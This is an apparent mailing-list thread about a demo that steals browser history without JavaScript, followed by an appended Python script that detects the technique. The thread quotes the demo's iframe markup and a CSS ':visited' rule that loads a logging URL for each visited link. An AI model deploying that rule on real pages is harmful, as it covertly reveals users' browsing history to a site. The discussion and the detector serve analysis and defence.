RE: Stealing browser history without JavaScript
>>>> Matej Kovacic wrote:
>>>>
>>>> Hi,
>>>>
>>>> this seems an interesting issue:
>>>>
>>>> http://www.making-the-web.com/misc/sites-you-visit/nojs/
>>>>
>>>> bye, Matej
>>>Anon Mus Wrote:
>>> Been to this site and it doesn't work on my firefox.3.0.8 browser... (with
>>> NoScript, QuickJava, Better Privacy, JavaScript Deobfuscator, Quick
>>> Preference Button & User Agent Switcher)
>>>
>>> it replies with a 0 (zero) count. But there should be dozens.
>> Zinco Wrote:
>> Seems to me it would have to have all websites known to man on the page it
>> loads. If it looks at "visited links" css on the page it loads it could
>> only look at websites on that page. It would have to store a lot of web
>> pages on that hidden i-frame to really compare. Unless you are looking to
>> see if a particular person visited a particular page doesn't seem like it
>> would do anyone much good.
>>
>Anon Mus Wrote:
>Maybe IFrames don't work on Firefox. The page's IFrame message "Please
>enable Iframes, though" is superfluous, as it only prints if IFrames is
>functional !!
>Reminds me of a security software con site years ago which would print
>some detail value known only to your browser, up on a web page. Of
>course, only YOU could see it, no data was sent to the visited web site.
>Even though it was a con, lots of people bought the security software
>to protect themselves from that non-existent leak.
>In this IFrames exploit the test web page is said to have a css
>background image embedded in it. I can find no such image (background:
>#003399;).
>(See http://www.w3schools.com/css/pr_background.asp.)
>The only image on the page is a javascript button. But there is a
>javascript dependent Google Analytics urchin tracker.
>Would the author Brendon Bo[mb]shell like to identify him/her self?
Zinco Wrote:
50000 pages isn't very much. Would have to contain millions it would seem.
It did work on my browser and found 30 of the most popular sites. eBay etc.
*************************
Index.php I-Frame
<iframe src="start_scan.php?769245844" width="300" height="260"
frameborder="0" scrolling="no">Please enable Iframes, though</iframe>
<p><!-- AddThis Button BEGIN -->
<!-- AddThis Button END -->
<script type="text/javascript">
digg_skin = 'compact';
digg_window = 'new';
</script>
<script src="http://digg.com/tools/diggthis.js"
type="text/javascript"></script>
<script type="text/javascript"
src="http://www.reddit.com/button.js?t=1"></script>
</p>
*******************************
Start_scan.php I-frame
<iframe src="sites_list.php?sess=fe728e" width="288" height="210"
frameborder="0"></iframe>
</div>
<iframe src="base.php?sess=fe728e" width="1" height="1"
frameborder="0"></iframe>
**********************************
Base.php
<style type="text/css">#l2001
a:visited{background:url(log_base.php?id=2001&sess=fe728e);}
***************************
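
Added example, not part of the thread or of the site's code: a small Python audit that pulls the <style> blocks out of page source and flags every rule whose selector contains :visited and whose declarations fetch a URL, which is the pattern in the Base.php line quoted above. The sample markup is constructed from that line, and the function and variable names are assumptions.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse, parse_qs

# Constructed sample, modelled on the Base.php line quoted in the thread.
SAMPLE = """<style type="text/css">
#l2001 a:visited{background:url(log_base.php?id=2001&sess=fe728e);}
#l2002 a:visited{background:url(log_base.php?id=2002&sess=fe728e);}
a:visited{color:#609;}
a:hover{background:url(hover.png);}
</style>"""

class StyleCollector(HTMLParser):
    """Collects the text content of every <style> element."""
    def __init__(self):
        super().__init__()
        self.in_style = False
        self.css = []
    def handle_starttag(self, tag, attrs):
        if tag == "style":
            self.in_style = True
    def handle_endtag(self, tag):
        if tag == "style":
            self.in_style = False
    def handle_data(self, data):
        if self.in_style:
            self.css.append(data)

RULE = re.compile(r"([^{}]+)\{([^{}]*)\}")          # selector { declarations }
URL = re.compile(r"url\(\s*['\"]?([^'\")]+)['\"]?\s*\)", re.I)

def find_visited_beacons(html):
    """Return (selector, url, query params) for each :visited rule that loads a URL."""
    collector = StyleCollector()
    collector.feed(html)
    hits = []
    for selector, body in RULE.findall("".join(collector.css)):
        if ":visited" not in selector.lower():
            continue                                  # only visited-state rules matter here
        for url in URL.findall(body):
            params = parse_qs(urlparse(url).query)    # e.g. per-link id and session token
            hits.append((selector.strip(), url, params))
    return hits

if __name__ == "__main__":
    for sel, url, params in find_visited_beacons(SAMPLE):
        print(sel, "->", url, params)
```

A plain a:visited colour rule and a :hover background are not reported; only visited-state rules that cause a request are.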